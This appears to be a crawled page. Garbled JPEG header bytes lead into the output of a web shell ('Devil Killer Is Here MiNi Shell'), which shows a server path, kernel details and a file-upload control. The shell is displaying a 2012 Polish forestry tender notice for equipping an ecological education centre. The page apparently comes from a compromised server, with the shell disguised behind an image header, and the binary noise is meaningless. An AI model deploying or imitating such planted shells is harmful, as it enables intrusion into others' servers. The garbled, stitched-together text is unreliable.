JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121218/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121218/516688-N-2012.html

<p class="kh_header"><b>Lubaczów: Zakup wyposażenia Ośrodka Edukacji Ekologicznej Nadleśnictwie Lubaczów</b><br>
<b>Numer ogłoszenia: 516688 - 2012; data zamieszczenia: 18.12.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Nadleśnictwo Lubaczów , ul. Słowackiego 20, 37-600 Lubaczów, woj. podkarpackie, tel. 016 6321972, 6321201, faks 016 6329004.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.krosno.lasy.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka organizacyjna Lasów Państwowych.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup wyposażenia Ośrodka Edukacji Ekologicznej Nadleśnictwie Lubaczów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wykonanie dostawy pod nazwą:  Zakup wyposażenia Ośrodka Edukacji Ekologicznej w Nadleśnictwie Lubaczów w tym:
Zadanie częściowe nr 1. Temat 1: Zakup i instalacja rolet elektrycznych -4 szt.
Wspólny Słownik Zamówień: 39515400-9 Rolety 
Opis: elektryczne rolety zaciemniające do projekcji multimedialnych -4 szt. będą wykonane z tkanin z atestem trudno zapalności i nie rozprzestrzeniania ognia . Kasety osłonowe rur nawojowych I boczne prowadnice tkaniny lakierowane. Rolety automatyczne ze sterowaniem na pilota radiowego lub podczerwień. 
Wymiary: 180 x 150 mm z siłownikiem tubowym TM 35 lub TM 25.     

Temat 2: Zakup , dostawa i montaż mebli do Sali edukacyjnej:
Wspólny Słownik Zamówień: 39100000-3 Meble
1.	Opis: Stoły edukacyjne szt. 4 - wykonane z litego dębu, lakierowane lakierem bezbarwnym, wymiary: wysokość 70 cm, długość 143 cm, szerokość 78 cm, blat stołu z grafiką edukacyjną - grafika kolorowa - trwale malowana na blacie /na litym drewnie lub sklejce/
-  jeden stół z grafiką o ptakach,
-  jeden stół z grafiką o zwierzętach,
-  jeden stół z grafiką o owocach leśnych,
-  jeden stół z grafiką o płazach i gadach.
2.	Ławki dębowe 8 szt. - wykonane z litego dębu, lakierowane, bez oparcia, wymiary: wysokość siedziska 42 cm, szerokość 27 cm, długość 140 cm.
3.	Szafki małe - 4 szt.  wykonane z litego dębu, lakierowane, wymiary: wysokość 59 cm, szerokość 90 cm, głębokość 43 cm, z. edukacyjną zwierząt lub roślin na frontach z podpisem w języku polskim i łacińskim - grafika /trwale malowana na drzwiach /na litym drewnie lub sklejce.
4.	Szafa na owoce leśne - wykonana z litego dębu, lakierowana, wymiary: wysokość 137 cm, szerokość 58 cm, głębokość 43 cm z szufladami. Na szufladach grafika edukacyjna - owoce leśne wraz z podpisem nazwy w języku polskim oraz łacińskim. - grafika /trwale malowana na drzwiach /na litym drewnie lub sklejce.
5.	Szafka duża - 2 szt. wykonane z litego dębu, lakierowane, wymiary: wysokość 113 cm, szerokość 90 cm, głębokość 43 cm z grafiką edukacyjną o roślinach lub zwierzętach na frontach z podpisem nazw w języku polskim i łacińskim - grafika / trwale malowana na drzwiach /na litym drewnie lub sklejce.
6.	Biurko i krzesło dębowe podrzeźbiane artystycznie - 1 komplet - wymiary stołu: wysokość 75 cm, szerokość 80 cm, wykonane z litego dębu, lakierowane, wymiary krzesła z oparciem: wysokość siedziska  43 cm, materiał lity dąb.  Biurko obudowane z trzech stron i podrzeźbiane od frontu, natomiast w krześle podrzeźbiane oparcie.
7.  Stoły i krzesła - 1 komplet obejmujący 70 szt. krzeseł oraz stoły dzielone tworzące  jeden ciąg o szerokości  70 cm i długości 18 mb, ułożonych w kształt podkowy . 
Opis materiału na stoły: - jasny buk, wymiary i kształt zgodnie z
załączonym rysunkiem.
Zasadnicze wymagania:
1. płyta meblowa o grubości min. 36 mm., matowa z widoczną strukturą drewna:
2. nogi i stelaż- wykonane na bazie rury stalowej, chromowanej, matowej o średnicy od 60 do 80 mm.
3. krawędzie oklejone PCV min. 2 mm. w kolorze płyty
4. stół zmontowany w całości.
5. - wysokość stołów 76 cm

Krzesło stacjonarne -kolor jasny buk
Zasadnicze wymagania:
1. podstawa drewno bukowe - cztery nogi
2. siedzisko i oparcie tapicerowane pianką PU i tkaniną trudno zapalną o odporności na ścieranie min.20 000 cykli; w kolorach i wzorze do uzgodnienia z zamawiającym,
3. konstrukcja siedziska i oparcia wykonana ze sklejki:
4. stopki chroniące podłogę przed zarysowaniem.
5.  wysokość siedzisk 46 cm.

Wymiary stołów i krzeseł wg. Normy Europejskiej: PN - EN 1729-1:2007 /Meble - Krzesła i stoły do instytucji edukacyjnych Część 1: Wymiary funkcjonalne/, oraz PN - EN 1729-2:2007 /Meble - Krzesła i stoły do instytucji edukacyjnych Część 2: Wymagania bezpieczeństwa i metody badań/ 
Zadanie częściowe nr 2. Temat:  Zakup dostawa i montaż elementów wyposażenia /dekoracji/  Sali edukacyjnej.

Wspólny Słownik Zamówień: 39290000-1 Wyposażenie różne

Opis. Zakup dostawa i montaż elementów wyposażenia /dekoracji/  Sali edukacyjnej:

1.	Drzewo artystyczne wraz z kompletem  tj. 15 gatunków ptaków śpiewających malowanych z gipsu / wykaz ptaków;  rudnik, słowik szary,  drozd śpiewak, kos, mysikrólik, bogatka, modraszka, czubatka, raniuszek, kowalik, sójka, wilga, zięba, gil, grubodziób / -  pień drzewa z gałęziami i korą o wysokości 2,0 m z umieszczonymi na gałęziach ptakami  śpiewającymi wykonanymi z gipsu. Wielkość ptaków oraz ich barwa odzwierciedlający ich wygląd naturalny. 
2.	Obicie artystyczne słupów nośnych drewnem oraz umieszczenie dzięciołów  na słupach - obicie słupów nośnych drewnem wraz z korą oraz umieszczenie na nich dzięciołów wykonanych z żywicy o naturalnym ubarwieniu oraz rozmiarze. - komplet 6 gatunków: dzięcioł duży, dzięcioł średni, dzięcioł zielony, dzięciołek dzięcioł trójpalczasty i dzięcioł czarny.
3.	Elementy dekoracyjne /sztukateria gipsowa - liście, linia dekoracyjna, juta maskująca, ptaki, motyle drewniane wycięte po konturach/ - liście dębowe wykonane z gipsu sztukateryjnego o naturalnych rozmiarach artystycznie pomalowane - ilość min. 30 szt., juta maskująca - tkanina maskująca o wymiarach 137x366 cm - 2 szt., motyle drewniane wycięte po konturach  x 10szt. 
                                                 Linia dekoracyjna -
4.	Galeria drzew na drewnie w ramach artystycznie woskowanych - namalowane na drewnie gatunki polskich drzew - 25 sztuk / wykaz drzew: jodła pospolita, świerk pospolity, modrzew europejski, sosna pospolita, topola osika, topola biała, topola czarna, wierzba krucha, brzoza brodawkowata, brzoza omszona, olsza czarna, grab pospolity, buk pospolity, dąb szypułkowy, dąb bezszypułkowy, wiąz górski, wiąz szypułkowy, jarząb pospolity, czeremcha pospolita, klon jawor, klon pospolity, klon polny, lipa drobnolistna, lipa szerokolistna, jesion wyniosły / wraz z podpisaniem nazwy w języku polskim i łacińskim. Wymiary  wraz z ramą 25,5 cm x 35,5 cm. Ramy artystycznie woskowane w kolorze brązowym.
5.	Mały zestaw interaktywny do wnętrz /do powieszenia na ścianie/ - 4 szt. - o treści
-Jakie to drzewo,
-jaki to ptak, 
-jakie to zwierzęta, 
-czyj to ślad, 
wymiary: wysokość 48 cm, szerokość 72 cm - wyposażony w 12 obracanych tabliczek z opisem z jednej strony oraz z ilustracją z drugiej strony. 

        6.   Mały zestaw interaktywny do wewnątrz, sztalugi, torba /do prezentacji w terenie/ -  wymiary tablic: wysokość 48 cm, szerokość 72 cm - wyposażony w 12 obracanych tabliczek z opisem z jednej strony oraz z ilustracją z drugiej strony. Sztaluga wykonana z drewna bukowego, zabezpieczona impregnatem i polakierowana. Wymiary sztalugi: wysokość podstawy min. 65 cm, szerokość podstawy min. 50 cm, wysokość całkowita sztalugi 1,40 - 1,50 m., wyposażona w regulację ustawień umożliwiającą stabilne utrzymanie obrazów o wysokości 103 m.
       7.   Zegar na drewnie do powieszenia na ścianie - zegar okrągły o średnicy min. 32 cm, z grafiką edukacyjną o tematyce przyrodniczej, z personalizacją w jednym kolorze: logo LP, nazwa i adres Zamawiajacego , informacja o dofinansowaniu projektu.
       8.   Logo Lasów Państwowych - płaskorzeźba - okrągła płaskorzeźba w drewnie o średnicy min. 30 cm. woskowana. 
       9.   Słupek dębowy  - stojąca naturalna kłoda dębowa z korą długości  od 1,5 do 2,0 m i średnicy min. 0,5 m. Kłoda powinna posiadać wiele ruchomych elementów, w których uwidoczniony będzie zróżnicowany stopień rozkładu drewna wraz  z owadami w nim żerującymi oraz chodnikami owadzimi. Wnętrze kłody podświetlone.
      10.  Gabloty z owadami i motylami - 1 komplet /gablot/- Gabloty entomologiczne do zawieszenia na ścianie o wymiarach 50 x 40 x 6 cm wykonane z drewna dębowego, lakierowane wysokiej klasy lakierem poliuretanowym, szkło 2 mm float, spód z płyty HDF 3 mm, wyklejone pianką polietylenową. Zamknięcie na podwójne pióro. Gabloty mają zawierać  następujące owady wraz z opisem nazwy polskiej i łacińskiej:
GABLOTA I
I.	PIERWOTNE SZKODNIKI DRZEWOSTANÓW IGLASTYCH
1.	Zawisak borowiec,
2.	Barczatka sosnówka,
3.	Brudnica mniszka - samiec,
4.	Brudnica mniszka - samica,
5.	Strzygonia choinówka,
6.	Poproch cetyniak,
7.	Osnuja gwiaździsta,
8.	Borecznik sosnowiec
II.	SZKODNIKI UPRAW I MŁODNIKÓW IGLASTYCH
1.	Zwójka sosnóweczka,
2.	Zwójka pędówka,
3.	Skośnik tuzinek,
4.	Szeliniak sosnowiec,
5.	Smolik znaczony,
6.	Borecznik rudy,
7.	Kluk czarny,
8.	Osnuja czerwono głowa,
9.	Sieciech niegłębek,
10.	Choinek szary,
11.	Osnuja sadzonkowa,
12.	Smolik drągowinowiec
III.	SZKODNIKI NASION I SZYSZEK
1.	Szyszeń sosnowy,
2.	Smolik szyszkowiec,
3.	Szyszeń pospolity
IV.	SZKODNIKISYSTEMÓW KORZENIOWYCH SIEWEK I SADZONEK
1.	Turkuć podjadek,
2.	Chrabąszcz majowy - samiec,
3.	Chrabąszcz majowy - samica,
4.	Wałkarz lipczyk
V.	SZKODNIKI DRZEWOSTANÓW ŚREDNICH I STARSZYCH KLAS WIEKU
1.	Tycz cieśla,
2.	Przypłaszczek granatek,
3.	Żerdzianka sosnówka,
4.	Kornik sześciozębny,
5.	Cetyniec większy,
6.	Drwalnik paskowany,
7.	Kornik drukarz,
8.	Rytownik pospolity, 
9.	Czterooczak świerkowiec,
10.	Żerdzianka krawiec,
11.	Jodłowiec krzywozębny,
12.	Jodłowiec kolcozębny,
13.	Jodłowiec Woroncowa,
14.	Smolik jodłowiec,
15.	Cetyniec mniejszy 
GABLOTA II
I.	SZKODNIKI PIERWOTNE DRZEWOSTANÓW LIŚCIASTYCH
1.	Brudnica nieparka - samiec,
2.	Brudnica nieparka - samica,
3.	Piędzik przedzimek - samiec,
4.	Piędzik przedzimek - samica,
5.	Szczotecznica szarawka,
6.	Zwójka zieloneczka,
7.	Kuprówka rudnica - samiec,
8.	Kuprówka rudnica - samica,
9.	Białka wierzbówka,
10.	Narożnica zbrojówka
II.	SZKODNIKI UPRAW I MŁODNIKÓW LIŚCIASTYCH
1.	Szerszeń,
2.	Rzemlik osikowiec,
3.	Rzemlik topolowiec,
4.	Rynnica topolówka,
5.	Przeziernik topolowiec,
6.	Hurmak Olchowiec,
7.	Krytoryjek Olchowiec,
8.	Rynnica olchowa
III.	SZKODNIKI NASION I OWOCÓW
1.	Słonik żołędziowiec,
2.	Zwójka skrzydlaneczka,
3.	Pachówka bukwioweczka,
4.	Pachówka żołędzióweczka
IV.	SZKODNIKI SYSTEMÓW KORZENIOWYCH SIEWEK I SADZINEK
1.	Jedwabek brunatny,
2.	Ogrodnica niszczy listka,
3.	Chrabąszcz majowy - samiec,
4.	Chrabąszcz majowy - samica,
5.	Chrabąszcz kasztanowiec - samiec,
6.	Chrabąszcz kasztanowiec - samica,
7.	Listnik zmiennobarwny,
8.	Guniak czerwczyk,
V.	SZKODNIKI DRZEWOSTANÓW ŚREDNICH I STARSZYCH KLAS WIEKU
1.	Galasówka dębianka,
2.	Ogłodek brzozowiec,
3.	Trociniarka czerwica,
4.	Opiętek dwuplamkowy,
5.	Drwionek okrętowiec,
6.	Rębacz szary,
7.	Ściga dębowa,
8.	Paśnik pałączasty,
9.	Paśnik niszczyciel,
10.	Drwalnik,
11.	Drwalniczek Saksesena,
12.	Ogłodek Grabowiec,
13.	Jeśniak czarny,
14.	Ogłodek wiązowiec,
15.	Ogłodek wielorzędowiec.
Dopuszcza się zmianę w wykazach gatunków drzew itp. Za zgodą Zamawiającego.
Zadanie częściowe nr 3. Temat: Zakup pomocy edukacyjnych  do Sali edukacyjnej.

 Wspólny Słownik Zamówień: 39162000-5 pomoce naukowe

Opis: Zakup pomocy edukacyjnych  do Sali edukacyjnej:

1.	Tropy zwierząt - 1 komplet - zestaw tropów 10 gatunków zwierząt: sarna, jeleń, dzik, zając, borsuk, lis, wilk, kaczka, wydra, tropy wykonane z żywicy o autentycznych rozmiarach. 
2.	Pieczęci edukacyjne - 1 komplet -  zestaw 13 pieczęci polskich drzew leśnych wykonanych na drenie oraz poduszka z tuszem.
3.	Drzewka edukacyjne - 1 komplet -  15 drewnianych deseczek w formacie 10x15 cm przedstawiających 8 gatunków drewna / wykaz gatunków drewna sosna, świerk, jodła, modrzew, dąb szypułkowy, buk, jesion, olcha czarna/ . Każdy gatunek przedstawiony jest na dwóch deseczkach - na jednej znajduje się nazwa gatunku wraz z nazwą łacińską, a na drugiej ilustracja drzewa, liścia / szyszki oraz nasiona. Nieparzysta deseczka wykonana jest wraz z nazwą oraz ilustracją gatunku.
4.	Plany lekcji - 200 szt. - papier w formacie min. A5 i gramaturze min. 
300 gr/m2, z grafiką o tematyce przyrodniczej, z personalizacją w jednym kolorze: logo LP, nazwa i adres Zamawiającego, informacja o dofinansowaniu projektu, /wzór do uzgodnienia z Zamawiającym/
5.	Zakładki edukacyjne - 300 szt. - o wymiarach 19cm x 5,0cm wykonane z kartonu o gramaturze min. 350 gr/m2, , z grafiką o tematyce przyrodniczej, z personalizacją w jednym kolorze: logo LP, nazwa i adres Zamawiającego, informacja o dofinansowaniu projektu/wzór do uzgodnienia z zamawiającym/
6.	Kolorowanka z naklejkami - mix - kolorowanki o formacie min. A5, min. 12 stron wraz z naklejkami. Rysunki drzew, ptaków, ssaków i owadów naszych lasów, wraz z naklejkami tych zwierząt lub roślin w zestawie /Wzór do uzgodnienia z Zamawiającym/
7.	Księga pamiątkowa - 1 szt.  - księga formatu A4, o gramaturze min. 300 gr/m2, okładka drewniana podrzeźbiana artystycznie. Rzeźba o tematyce przyrodniczej.
8.	Linijki edukacyjne - 100 szt. - wykonane z litego drewna, długości min. 27 cm, z grafiką o tematyce przyrodniczej, z personalizacją w jednym kolorze: logo LP, nazwa i adres Zamawiajacego, informacja o dofinansowaniu projektu /wzór do uzgodnienia z Zamawiającym/
        9.   Tablica ścieralna lakierowana 100x150 cm. - biała tablica z powierzchnią magnetyczną, sucho ścieralną. Odporna na uszkodzenia, osadzona w aluminiowej ramie z plastikowymi rogami. Dołączona półka na mazaki oraz zestaw mazaków.
Zadanie częściowe nr 4. Temat: Zakup sprzętu audiowizualnego na doposażenie świetlicy oraz sali edukacyjnej.

Wspólny Słownik Zamówień 32320000-2 Sprzęt telewizyjny i audiowizualny

Opis: Zakup sprzętu audiowizualnego na doposażenie świetlicy oraz sali edukacyjnej.

1.	Zestaw kina domowego - 1 szt.
- tuner radio FM,
- RDS,
- odtwarzanie formatów: DivX, XviD, WMA, MPEG4, MP3,
- odtwarzanie płyt: DVD, DVD-R, DVD-RW,
- Dolby ProLogicll, Dolby ProLogic, Dolby Digital,
- gniazdo SCART / eurozłącze/,
- wyjście HDMI,
- wyjście Composite video RCA Cinch,
- port USB,
- pilot.

2.	Elektryczny ekran projekcyjny 240x240 - 2 szt.
- seria: ekonomiczny,
- szerokość: 240 cm, wysokość 240 cm
- Gain Faktor: 1,2,
- format: 1:1,
-typ: silnik
-czarne obrzeże,
-czarna druga strona ekranu.

3.	Projektor i uchwyt podwieszany - 2 szt.:
- stosunek projekcji: 1.53-2.36:1,
- jasność: 4100 ANSI,
- jasność w trybie ECO: 3280 ANSI,
- rozdzielczość: 1024x768 XGA,
- typ DLP,
- kontrast 3200:1,
- uchwyt do projektora
- stan: HDMI x2, DVI-I, D-SUB 15 pin In /VGA/, D-SUB 15 pin out /VGA/, YUV
Component /RGB/, Cinch-Video, S-Video, RS232, USB TypA, USB TypB, 3,5 mm
Mini Jack, RJ45, 12V Trigger, WLAN zintegrowany, funkcje specjalne: Lens Shift, PC free.

4.	Kamera z głowicą obrotową z intuicyjnym zoom cyfrowym 10X / w tym 2 razy na bezstratny zoom XGA/wyjścia WXGA, 1,9 razy bezstratny zoom SXGA wyjścia/ i digital ręczny zoom, zaawansowane funkcje z funkcją Split screen, możliwość podziału ekranu umożliwiająca projekcję obrazu na żywo i zdjęć z karty SD lub 1GB pamięci wewnętrznej , wbudowany mikrofon, możliwość pisania notatek na żywo, uniwersalny pilot.

5.	Odtwarzacz/nagrywarka DVD - 2 szt.
- funkcja nagrywania płyt,
- system nagrywania: PAL/NTSC,
- rodzaj zapisywanych płyt: DVD+R/RW, 
- obsługa płyt dwu-warstwowych /Dual Layer 8,5 GB/,
- tryb zapisu SLP6 godz./płytę,
- funkcje edycji, 
- odtwarzanie plików: DivX, XviD, WMA, MPEG4, MP3, JPEG
- rodzaj odtwarzanych płyt: DVD, DVD-R, DVD-RW
- odtwarzanie napisów do filmów DivX,
- odtwarzanie z przesunięciem czasowym /HDD/,
- konwersacja do HDTV 1080i, 
- obsługiwane systemy audio Dolby digital AC-3, 
- 2 x gniazdo SCART /eurozłącze/,
- wyjścia HDMI, 
- wejścia Audio RCA Cinch,
- inne gniazda: Komponent video, DV-in,
- port USB,
- nagrywarka combo DVD-VHS,
-pilot,
- zasilanie 220 - 240 V, 50/60Hz,
- szerokość 435 mm,
- wysokość 99 mm,
- głębokość 388 mm.

6.	 Telewizor - 1 szt.
                Z podświetleniem Edge LED o przekątnej 55 cali i rozdzielczości FULL HD /1920 x 1080/. 
               Charakteryzuje się kontrastem dynamicznym na poziomie   jasnością 6 000 000:1, 450 cd/m2 i częstotliwością odświeżania 200 Hz. 
              Wyposażony w tuner DVB-T, DVB-S i DVB-C, dźwięk Mono/Stereo: System audio Infinite  Sound, złącza: 4 x HDMi, 2 x USB 2.0, 2 x kompozytowe, 1 x komponentowe, 1 x Scart, 1 x VGA, 1 x Audio RCA, 1 x Audio cyfrowe optyczne, 1 x słuchawki, 1 x PC Audio (Jack), 1 x Ethernet RJ-45, 1 x Ci+, 1 x RS-232C, 1 x antenna, Bluetooth. Gniazdko scart, 4 x wejście HDMI, wejście PC. 


Dodatkowo należy wykonać okablowanie OEE 

Okablowanie Sali -należy wykonać  w miejscach wskazanych przez Zamawiającego, 
-kabel głośnikowy - 30 mb,
-kabel HDMi - 35 mb,
-kabel Dvi-I-20 mb,
-kabel D-SUB 20 mb,
-kabel LAN - 20 mb,
-kabel zasilający - 15 mb,
-listwa zasilająca 5 gniazd z uziemieniem x2,
-kabel RCA Cinch - 12 mb.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających do 20% zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.10.00.00-3, 39.51.54.00-9, 39.29.00.00-1, 39.16.20.00-5, 32.32.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.03.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Oferta musi być zabezpieczona wadium w wysokości: 
Na zadanie częściowe nr 1 - 2.000.00 PLN /słownie: dwa tysiące złotych  00/100 PLN/,
Na zadanie częściowe nr 2 -  900.00 PLN /słownie: dziewięćset złotych  00/100 PLN/,
Na zadanie częściowe nr 1 -  90.00 PLN /słownie: dziewięćdziesiąt złotych  00/100 PLN/,
Na zadanie częściowe nr 1 -  800.00 PLN /słownie: osiemset złotych  00/100 PLN/,

1.2.	Wadium należy wnieść w terminie do dnia 2012.12.31 do godz. 10:00.
1.3.	Wadium może być wnoszone w jednej lub kilku następujących formach:
1.4.	pieniądzu: przelewem na rachunek bankowy Zamawiającego: PEKAO S.A. I oddz. w Lubaczowie 93124025841111000039445436;
1.5.	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym:
1.6.	gwarancjach bankowych:
1.7.	gwarancjach ubezpieczeniowych:
1.8.	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości /Dz. U. Nr 109, poz. 1158, z późn. zm./.
1.9.	Wadium wniesione w pieniądzu przelewem na rachunek bankowy musi wpłynąć na wskazany w pkt. 1.3. a:  rachunek bankowy najpóźniej przed upływem terminu składania ofert Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.
1.10.	Wadium wniesione w formie poręczenia bankowego, gwarancji bankowej , gwarancji ubezpieczeniowej lub poręczenia udzielonego przez uprawnione podmioty należy złożyć w Kasie Zamawiającego.
1.11.	Wykonawca zobowiązany jest wnieść wadium na okres związania ofertą.
1.12.	Do oferty należy dołączyć potwierdzoną za zgodność z oryginałem kserokopię potwierdzenia wniesienia wadium.
1.13.	Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem Art. 46 ust. 4a ustawy pzp.
1.14.	Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy, jeżeli jego wniesienia żądano.
1.15.	Zamawiający zwraca niezwłocznie wadium, na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
1.16.	Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium na podstawie Art. 46 ust. 1 ustawy pzp, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.
1.17.	Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.
